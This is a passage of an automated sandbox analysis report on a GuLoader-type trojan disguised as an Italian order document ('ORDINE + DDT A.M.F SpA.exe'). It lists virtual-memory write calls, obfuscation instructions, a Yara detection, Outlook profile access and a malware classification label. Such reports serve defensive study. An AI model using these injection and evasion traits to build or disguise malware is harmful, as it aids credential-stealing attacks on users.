        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227732E2_2_0227732E
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227871A2_2_0227871A
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022767682_2_02276768
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022787752_2_02278775
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022767702_2_02276770
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227CFA22_2_0227CFA2
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227BFB42_2_0227BFB4
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022773B22_2_022773B2
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276BBD2_2_02276BBD
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02277FB92_2_02277FB9
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227C3862_2_0227C386
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276F852_2_02276F85
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B7852_2_0227B785
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227CFE12_2_0227CFE1
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02275FF42_2_02275FF4
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022757CF2_2_022757CF
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022787CE2_2_022787CE
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227ABD42_2_0227ABD4
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022763DF2_2_022763DF
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022763DD2_2_022763DD
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022758222_2_02275822
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227D02D2_2_0227D02D
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022770372_2_02277037
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022768312_2_02276831
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022758022_2_02275802
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227C0162_2_0227C016
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227D06E2_2_0227D06E
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022788772_2_02278877
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B87F2_2_0227B87F
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227BC792_2_0227BC79
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276C432_2_02276C43
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022774A52_2_022774A5
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227C09D2_2_0227C09D
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022770E12_2_022770E1
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B4E92_2_0227B4E9
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022768E92_2_022768E9
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276CF42_2_02276CF4
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022788C62_2_022788C6
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022764C82_2_022764C8
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227D0DB2_2_0227D0DB
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B9272_2_0227B927
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B5252_2_0227B525
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B5232_2_0227B523
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227D12E2_2_0227D12E
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227C1142_2_0227C114
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276D6F2_2_02276D6F
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022775772_2_02277577
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227D1712_2_0227D171
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276D7C2_2_02276D7C
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276D4E2_2_02276D4E
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227895F2_2_0227895F
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B5A32_2_0227B5A3
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022769AB2_2_022769AB
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022725B82_2_022725B8
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02278D8E2_2_02278D8E
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227C1922_2_0227C192
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227719D2_2_0227719D
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B1EB2_2_0227B1EB
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227D1EB2_2_0227D1EB
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276DF22_2_02276DF2
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02278DD32_2_02278DD3
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022782FF NtAllocateVirtualMemory,2_2_022782FF
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227CB17 NtProtectVirtualMemory,2_2_0227CB17
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02277625 NtWriteVirtualMemory,2_2_02277625
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227622C NtWriteVirtualMemory,LoadLibraryA,2_2_0227622C
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276A38 NtWriteVirtualMemory,2_2_02276A38
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227CAAA NtProtectVirtualMemory,2_2_0227CAAA
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227768F NtWriteVirtualMemory,2_2_0227768F
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227728D NtWriteVirtualMemory,2_2_0227728D
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276AE4 NtWriteVirtualMemory,2_2_02276AE4
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276ED6 NtWriteVirtualMemory,2_2_02276ED6
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02278327 NtAllocateVirtualMemory,2_2_02278327
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227732E NtWriteVirtualMemory,2_2_0227732E
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276770 NtWriteVirtualMemory,2_2_02276770
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02277754 NtWriteVirtualMemory,2_2_02277754
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022773B2 NtWriteVirtualMemory,2_2_022773B2
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276BBD NtWriteVirtualMemory,2_2_02276BBD
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276F85 NtWriteVirtualMemory,2_2_02276F85
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022783C3 NtAllocateVirtualMemory,2_2_022783C3
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02277037 NtWriteVirtualMemory,2_2_02277037
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276831 NtWriteVirtualMemory,2_2_02276831
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276C43 NtWriteVirtualMemory,2_2_02276C43
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022774A5 NtWriteVirtualMemory,2_2_022774A5
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02278494 NtAllocateVirtualMemory,2_2_02278494
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022770E1 NtWriteVirtualMemory,2_2_022770E1
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022768E9 NtWriteVirtualMemory,2_2_022768E9
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276CF4 NtWriteVirtualMemory,2_2_02276CF4
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276D6F NtWriteVirtualMemory,2_2_02276D6F
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02277577 NtWriteVirtualMemory,2_2_02277577
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276D7C NtWriteVirtualMemory,2_2_02276D7C
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276D4E NtWriteVirtualMemory,2_2_02276D4E
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022769AB NtWriteVirtualMemory,2_2_022769AB
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227719D NtWriteVirtualMemory,2_2_0227719D
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B1EB NtWriteVirtualMemory,2_2_0227B1EB
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02276DF2 NtWriteVirtualMemory,2_2_02276DF2
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess Stats: CPU usage > 98%
        Source: ORDINE + DDT A.M.F SpA.exe, 00000002.00000002.238038485259.0000000000426000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameHYDROCHELIDON.exe vs ORDINE + DDT A.M.F SpA.exe
        Source: ORDINE + DDT A.M.F SpA.exe, 00000008.00000000.238030340785.0000000000426000.00000002.00020000.sdmpBinary or memory string: OriginalFilenameHYDROCHELIDON.exe vs ORDINE + DDT A.M.F SpA.exe
        Source: ORDINE + DDT A.M.F SpA.exeBinary or memory string: OriginalFilenameHYDROCHELIDON.exe vs ORDINE + DDT A.M.F SpA.exe
        Source: ORDINE + DDT A.M.F SpA.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: ORDINE + DDT A.M.F SpA.exeStatic PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeSection loaded: edgegdi.dllJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeSection loaded: edgegdi.dllJump to behavior
        Source: ORDINE + DDT A.M.F SpA.exeStatic PE information: invalid certificate
        Source: ORDINE + DDT A.M.F SpA.exeVirustotal: Detection: 21%
        Source: ORDINE + DDT A.M.F SpA.exeStatic PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeSection loaded: C:\Windows\SysWOW64\msvbvm60.dllJump to behavior
        Source: unknownProcess created: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe"
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess created: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe"
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess created: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe "C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exe" Jump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Crypto\RSA\S-1-5-21-3425316567-2969588382-3778222414-1001\1b1d0082738e9f9011266f86ab9723d2_11389406-0377-47ed-98c7-d564e683c6ebJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeFile created: C:\Users\user\AppData\Local\Temp\~DFBA8B24485FEA2BF0.TMPJump to behavior
        Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@3/5@3/2
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeMutant created: \Sessions\1\BaseNamedObjects\28278665D4ACB73EF64D459A
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\OutlookJump to behavior

        Data Obfuscation:

        barindex
        Yara detected GuLoaderShow sources
        Source: Yara matchFile source: 00000002.00000002.238039784452.0000000002270000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000008.00000000.238036448865.0000000000560000.00000040.00000001.sdmp, type: MEMORY
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_004078D8 push ds; ret 2_2_004078D9
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_00407B43 push es; ret 2_2_00407B68
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_00409392 push esi; retf 2_2_00409398
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_004083A0 pushad ; ret 2_2_004083A1
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02272A15 push edx; ret 2_2_02272A4C
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02272A4D push edx; ret 2_2_02272A4C
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022742FC push eax; retn 0010h2_2_02274835
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02271BFE push ss; ret 2_2_02271E0B
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022747F8 push eax; retn 0010h2_2_02274835
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227B4E9 push edx; retn 9253h2_2_0227DE81
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02271CCE push ss; ret 2_2_02271E0B
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227AD25 push FFFFFFB9h; retf 2_2_0227AD2A
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_0227AD2D push FFFFFFB9h; retf 2_2_0227AD4C
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02275183 push esp; retf 2_2_02275184
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_02271D80 push ss; ret 2_2_02271E0B
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeCode function: 2_2_022729F4 push edx; ret 2_2_02272A4C
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
        Source: C:\Users\user\Desktop\ORDINE + DDT A.M.F SpA.exeProcess information set: NOGPFAULTERRORBOXJump to behavior
